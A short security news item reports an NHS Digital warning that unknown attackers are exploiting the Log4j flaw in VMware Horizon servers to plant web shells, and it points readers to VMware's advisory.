NHS warns of attackers targeting Log4j flaws in VMware Horizon
The UK’s National Health Service (NHS) Digital has issued a warning regarding attackers actively targeting the Log4j CVE-2021-44228 vulnerability in VMware Horizon servers to establish persistence.
Officials say the threat group is unknown. The observed attacks target the Log4j vulnerability in the Apache Tomcat service, which is integrated with VMware Horizon.
Their attack activity likely contains a reconnaissance phase, during which they use Java Naming and Directory Interface (JNDI) via Log4Shell payloads to recall malicious infrastructure, the NHS wrote in its review.
“Once a weakness has been identified, the attack then uses Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service,” said explained the officials.
The attacker could then use this web shell to perform malicious actions such as deploying more malware, exfiltrating data, or launching a ransomware attack. In the advisory, the NHS noted that more VMware systems may be vulnerable and businesses should review the VMSA-2021-0028 Security Advisory: VMware Response to Apache Log4j Remote Code Execution Vulnerability
Read more details here.